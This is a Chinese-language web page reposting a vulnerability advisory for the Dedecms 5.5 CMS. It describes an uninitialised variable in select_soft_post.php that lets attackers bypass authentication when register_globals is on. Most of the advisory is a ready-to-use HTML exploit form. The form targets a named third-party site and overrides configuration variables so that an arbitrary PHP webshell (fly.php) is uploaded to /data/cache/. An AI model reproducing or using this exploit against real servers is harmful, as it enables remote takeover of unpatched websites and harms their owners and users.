• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    公众号

织梦(Dedecms)select_soft_post.php页面变量未初始漏洞

原作者: [db:作者] 来自: [db:来源] 收藏 邀请

漏洞版本:

Dedecms 5.5

漏洞描述:

漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。

测试方法:

  • <html>
  • <head>
  • <title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
  • </head>
  • <bodystyle="FONT-SIZE:9pt">
  • ---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br/><br/>
  • <formaction=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.phpmethod='POST'enctype="multipart/form-data"name='myform'>
  • <inputtype='hidden'name='activepath'value='/data/cache/'/>
  • <inputtype='hidden'name='cfg_basedir'value='../../'/>
  • <inputtype='hidden'name='cfg_imgtype'value='php'/>
  • <inputtype='hidden'name='cfg_not_allowall'value='txt'/>
  • <inputtype='hidden'name='cfg_softtype'value='php'/>
  • <inputtype='hidden'name='cfg_mediatype'value='php'/>
  • <inputtype='hidden'name='f'value='form1.enclosure'/>
  • <inputtype='hidden'name='job'value='upload'/>
  • <inputtype='hidden'name='newname'value='fly.php'/>
  • Select U Shell <inputtype='file'name='uploadfile'size='25'/>
  • <inputtype='submit'name='sb1'value='确定'/>
  • </form>
  • <br/>It's just a exp for the bug of Dedecms V55...<br/>
  • Need register_globals = on...<br/>
  • Fun the game,get a webshell at /data/cache/fly.php...<br/>
  • </body>
  • </html>

  • 鲜花

    握手

    雷人

    路过

    鸡蛋
    该文章已有0人参与评论

    请发表评论

    全部评论

    专题导读
    上一篇:
    PHP中单引号与双引号的区别发布时间:2022-07-10
    下一篇:
    2018.5.14PHP基础学习发布时间:2022-07-10
    热门推荐
    阅读排行榜

    扫描微信二维码

    查看手机版网站

    随时了解更新最新资讯

    139-2527-9053

    在线客服(服务时间 9:00~18:00)

    在线QQ客服
    地址:深圳市南山区西丽大学城创智工业园
    电邮:jeky_zhao#qq.com
    移动电话:139-2527-9053

    Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap